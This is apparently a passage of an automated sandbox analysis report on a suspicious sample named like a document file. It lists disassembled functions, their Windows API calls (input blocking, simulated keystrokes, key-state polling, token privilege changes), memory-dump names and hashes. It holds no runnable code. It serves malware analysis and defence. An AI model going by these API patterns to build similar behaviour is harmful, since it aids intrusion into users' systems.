                                                        • Instruction Fuzzy Hash: 39219631200154BFCF35DF68ED48AAA3BA2EF49370F588265F5294B2E2D7389D51E710
                                                        Function 0075FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0075FD71
                                                        • FindClose.KERNEL32(00000000), ref: 0075FDA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: d7d04d7cde89de8896864d33ed1b1b402afe37be2413bba130b7d99792ed5162
                                                        • Instruction ID: 9d0e5a16768b902a9973fa334936e99a4821c78260cd42a96f2ea928f39101f6
                                                        • Opcode Fuzzy Hash: d7d04d7cde89de8896864d33ed1b1b402afe37be2413bba130b7d99792ed5162
                                                        • Instruction Fuzzy Hash: 7211C432610204DFD710EF29D849A6AB7E8FF88324F00851EF9A5DB391DB78ED058B85
                                                        Function 0077F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0078F352,?,?,?), ref: 0077F115
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0077F0FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                        • String ID:
                                                        • API String ID: 1273190321-0
                                                        • Opcode ID: 89114badf81f7a6f8b74a21a34489e417926d259b11a1b37871309ced9d0eb07
                                                        • Instruction ID: 4c334285ca865209700a2991d9db8cbe49591f0ef68253477b0d35c07b4bb874
                                                        • Opcode Fuzzy Hash: 89114badf81f7a6f8b74a21a34489e417926d259b11a1b37871309ced9d0eb07
                                                        • Instruction Fuzzy Hash: 2101B131200618EBCF21DF58ED89F6A3BB6FB853A4F548525F8190B2E1C7399C12EB50
                                                        Function 0077F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0077F47D
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0078F42E,?,?,?,?,?), ref: 0077F4A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClientDialogNtdllProc_Screen
                                                        • String ID:
                                                        • API String ID: 3420055661-0
                                                        • Opcode ID: 6b28530ec149c054632583c62038ec1187ba36901c4d05b7dcd3731fbca5529a
                                                        • Instruction ID: 98e526bb567c595b841c98cf983811bf59b8350d5f57d28187ffe1bf9e9fd3f8
                                                        • Opcode Fuzzy Hash: 6b28530ec149c054632583c62038ec1187ba36901c4d05b7dcd3731fbca5529a
                                                        • Instruction Fuzzy Hash: C2F03A72400118FFEF049F95DC099AE7FB9FF44351F10802AF902A2160D3B9AE51EB64
                                                        Function 0075D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0076C2E2,?,?,00000000,?), ref: 0075D73F
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0076C2E2,?,?,00000000,?), ref: 0075D751
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 1677f85a98d82ab6499f07874fa59222b3826385205bc9f4e7da53637f1555c9
                                                        • Instruction ID: 7d7ecdd8c094bf84c6b78dc0a77c50046f21eaf450c19ebd2f59fc52d9ef688c
                                                        • Opcode Fuzzy Hash: 1677f85a98d82ab6499f07874fa59222b3826385205bc9f4e7da53637f1555c9
                                                        • Instruction Fuzzy Hash: C5F05835500229AADB21AFA4CC4DFEA776CAF49362F008516BA09E6181D6789A44CBA5
                                                        Function 00754B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00754B89
                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00754B9C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: 53cc844f8842668ceaafd869dab324b292e63aad1fb6d9c114371c34f93d2ef0
                                                        • Instruction ID: ca572e9782ef64692d93ca9ea481903491d931639a5fd6c2d88d272c6775da8b
                                                        • Opcode Fuzzy Hash: 53cc844f8842668ceaafd869dab324b292e63aad1fb6d9c114371c34f93d2ef0
                                                        • Instruction Fuzzy Hash: 37F06D7080024DAFDB058FA1C805BBE7BB4AF00309F00C40AFD61A5191D7B9CA16DFA4
                                                        Function 0074B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0074B9EC), ref: 0074B8C5
                                                        • CloseHandle.KERNEL32(?,?,0074B9EC), ref: 0074B8D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: d7477f593f03bece717a57f79df89c8d7272f373aee3d467641aebe0a360d08c
                                                        • Instruction ID: 49ea79a2b51424d3c6388c0ab9dbab8c7f677b2595ad57fa28a6fee3cf57169c
                                                        • Opcode Fuzzy Hash: d7477f593f03bece717a57f79df89c8d7272f373aee3d467641aebe0a360d08c
                                                        • Instruction Fuzzy Hash: E3E0B672004611EEE7362B64EC09EB6BBEDEF04311B11C82AF59681471DB66AC91DB50
                                                        Function 0077F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0077F59C
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0078F3AD,?,?,?,?), ref: 0077F5C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 58ae72a752ca4f61e566835a916372d6e19d1b52ed91ac9a9b821e2cca13764e
                                                        • Instruction ID: 2ebf54a9ebd043808a7b7f5ab51d4f9115ef6143a832d9c7c872452856259559
                                                        • Opcode Fuzzy Hash: 58ae72a752ca4f61e566835a916372d6e19d1b52ed91ac9a9b821e2cca13764e
                                                        • Instruction Fuzzy Hash: B5E08C30104219BBEB240F09DD0AFB93B18EB00B90F10C526F91A880E0D7B888A1D664
                                                        Function 00738E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0071125D,00737A43,00710F35,?,?,00000001), ref: 00738E41
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00738E4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 7592c6fdfa1f8e8909f1f527733a6450d6a6339c6c6664c92995df50550d1999
                                                        • Instruction ID: 84a4e863ba457dfa205f58d02949ef4c6014760767f9422db0eb8acd2654d826
                                                        • Opcode Fuzzy Hash: 7592c6fdfa1f8e8909f1f527733a6450d6a6339c6c6664c92995df50550d1999
                                                        • Instruction Fuzzy Hash: 11B09271044A08EBEA102BB1EC09B883F68EB0AA63F008012F61D442608B6758528A9A
                                                        Function 00723680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: f9e5f676fa9be41776f4e24ef96298acf737d9151fbd3dae0d0222c9fee7c08b
                                                        • Instruction ID: 4d6b96b50768a57d605dc1b74fad66fab061b050bbbf43d4ba7372dd27aa7ab9
                                                        • Opcode Fuzzy Hash: f9e5f676fa9be41776f4e24ef96298acf737d9151fbd3dae0d0222c9fee7c08b
                                                        • Instruction Fuzzy Hash: 7E927970608351DFD724DF18D484B6AB7F1BF88304F14885EE98A8B2A2D779ED85CB52
                                                        Function 0074113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7a92c5c9d6197b43a6fc01ebcca310d6540041a1a0ae5cd8dfb4f83142d5d56
                                                        • Instruction ID: 4113cc3ca314d527a3c28f33e7ca928a0372a27afc73d10766dfe4692417f5ee
                                                        • Opcode Fuzzy Hash: c7a92c5c9d6197b43a6fc01ebcca310d6540041a1a0ae5cd8dfb4f83142d5d56
                                                        • Instruction Fuzzy Hash: 9AB1E120E2AF404DD62396398831337B65CAFFB2D5F92D71BFC2A74D22EB2585834184
                                                        Function 007802AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00780352
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 8318ff762e52ac5edc3de040440770489e8dfdb60c3bc0b1b5a2b7234e6f7375
                                                        • Instruction ID: 81e6076d47f0e5ac99f6b6ba43d5a0877be6f548c84d2a8389786fe4f0edf613
                                                        • Opcode Fuzzy Hash: 8318ff762e52ac5edc3de040440770489e8dfdb60c3bc0b1b5a2b7234e6f7375
                                                        • Instruction Fuzzy Hash: 18112731284255FFEB656B28CC49F793B24EB41760F248319F9215A5E2CAAC8D04D3E9
                                                        Function 0077E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0077E7AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$CallLongProc
                                                        • String ID:
                                                        • API String ID: 4084987330-0
                                                        • Opcode ID: 1a3f8d21c1d7ad67ec9c5c8430a584c35298b7f042e9dd762b8ac5be5286d5ec
                                                        • Instruction ID: 87971511a88eda916e95c4623f199b536faabbc47e09ca6d6a4f18fbe195c333
                                                        • Opcode Fuzzy Hash: 1a3f8d21c1d7ad67ec9c5c8430a584c35298b7f042e9dd762b8ac5be5286d5ec
                                                        • Instruction Fuzzy Hash: EEF03C31100108FFCF09DF94EC448793BAAEB08360B408565F9198A6A1C73A9D71EB90
                                                        Function 0077EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                          • Part of subcall function 0072B736: GetCursorPos.USER32(000000FF), ref: 0072B749
                                                          • Part of subcall function 0072B736: ScreenToClient.USER32(00000000,000000FF), ref: 0072B766
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000001), ref: 0072B78B
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000002), ref: 0072B799
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0078F417,?,?,?,?,?,00000001,?), ref: 0077EA9C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                        • String ID:
                                                        • API String ID: 2356834413-0
                                                        • Opcode ID: 0c82190f55a57b265b9251c0c4b352ec358cf1e5447fd288c4ee42b5020312e9
                                                        • Instruction ID: 3662d116af25e41648dbadbce6801c8c53ca389ed51243922f731ecdba7af8a4
                                                        • Opcode Fuzzy Hash: 0c82190f55a57b265b9251c0c4b352ec358cf1e5447fd288c4ee42b5020312e9
                                                        • Instruction Fuzzy Hash: 81F0A731100229FBDF14AF59DC09EBA3F65FB04790F408016F90A1A191D77E98B1EBD1
                                                        Function 0072B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0072AF40,?,?,?,?,?), ref: 0072B83B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 5832a3d9f15721d9ce63a083ed649e0fc770c0c99eac78b888d33c8193101361
                                                        • Instruction ID: 1ea7ca8362f6a42023ac61886903c0739b4fd2e0d9cd79399bfc330bebffd0a7
                                                        • Opcode Fuzzy Hash: 5832a3d9f15721d9ce63a083ed649e0fc770c0c99eac78b888d33c8193101361
                                                        • Instruction Fuzzy Hash: E3F08230600259EFDB18DF54DC949353BB6FB45370F50822AF9568B2A0D779DC60EB94
                                                        Function 0076703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00767057
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 9d64541e73f87b6c6c4a70ef50d8aad7ce44cbab9c200da7ba8683d3d0846795
                                                        • Instruction ID: 2745ed5ce4ec0f1026d75d5c57741676f18876f814720503f3909d420e507785
                                                        • Opcode Fuzzy Hash: 9d64541e73f87b6c6c4a70ef50d8aad7ce44cbab9c200da7ba8683d3d0846795
